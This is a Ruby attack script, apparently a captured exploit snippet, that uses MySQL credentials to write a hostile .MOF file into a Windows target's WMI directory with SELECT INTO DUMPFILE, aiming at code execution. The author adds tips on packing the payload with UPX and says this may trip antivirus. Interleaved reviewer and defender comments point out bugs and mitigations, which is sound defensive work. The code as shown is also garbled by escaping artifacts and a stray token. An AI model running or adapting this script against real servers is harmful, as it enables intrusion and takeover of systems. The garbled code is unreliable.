#!/usr/bin/env ruby
# Code Snippet by HR
# We need mysql gem for connection handling
require \'rubygems\'
require \'mysql\'
# Hard-coded placeholder settings read by the rest of the script: MySQL host and
# credentials, the local file to send, and the destination path on the server.
# NOTE(review): the \' sequences around the literals (and the long backslash runs
# in target_path) look like an escaping artifact from how this page was captured;
# as shown, these lines are not valid Ruby.
target=\'127.0.0.1\' # Your Target IP running MySQL
user=\'username\' # MySQL User
pass=\'password\' # MySQL Password
file=\'/local/path/to/evil.mof\' # Local Evil .MOF File to upload
# Defender note: the destination is the WMI MOF directory under system32, which the
# author's comment ties to the MOF compiler. Unexpected file creation in this
# directory by a database service process is worth alerting on.
target_path="c:\\\\\\\\windows\\\\\\\\system32\\\\\\\\wbem\\\\\\\\mof\\\\\\\\evil.mof" # Path on Target to MOF compiler
# Establish connection or fail
# Open the MySQL session with the configured host and credentials. A driver-level
# failure is reported on stdout and ends the script with a non-zero status.
dbc =
  begin
    Mysql.connect(target, user, pass)
  rescue Mysql::Error => conn_err
    # NOTE(review): on POSIX systems exit statuses are 8-bit, so the parent
    # process would observe 154 rather than 666.
    puts "Connection Problem!", "\\t=> #{conn_err}"
    exit 666
  end
# Take our local file, convert to hex and write to target filesystem
# This will work for any binary file, not just .MOF files....
# Try to keep your upload file size small or you will have to use more SQL magic to upload it in chunks to a temp db and table, then dump the table content to file but lets keep it simple....
# Read the whole local file in binary mode and hex-encode it into one 0x... literal.
# The handle returned by File.open is never closed explicitly here, and the entire
# file is held in memory and sent as a single statement.
data = "0x" + File.open(file, \'rb\').read.unpack(\'H*\').first
begin
# Ask the server to write the decoded bytes to target_path on its own filesystem.
# Defender note: SELECT ... INTO DUMPFILE only succeeds when the connecting account
# holds the FILE privilege, the server's secure_file_priv setting (where set) permits
# the destination, and the database service account can write to that directory.
# Withholding FILE from application accounts, restricting secure_file_priv, and
# running the service under a low-privilege account are the matching mitigations.
dbc.query("SELECT #{data} INTO DUMPFILE \'#{target_path}\'")
puts "File uploaded successfully!"
rescue Mysql::Error => e
# NOTE(review): the bare `white` after the string literal on the next line is not
# valid Ruby; it looks like a stray token picked up when the page was captured.
puts "Problem writing payload to file!"white
puts "\\t=> #{e}"
# NOTE(review): e is the exception object, not a String, so unless Mysql::Error
# defines =~ itself this match does not inspect the message text; confirm intent.
if e =~ /MySQL server has gone away/
puts "This is likely due to payload which is too large in size....."
puts "Try compressing with UPX to shrink size down: upx 9 -qq #{file}" # UPX can shrink your payload big time, but can cause some AV to freak out so be smart and use what works for you....
puts "\\t=> Then try again....."
end
end
#EOF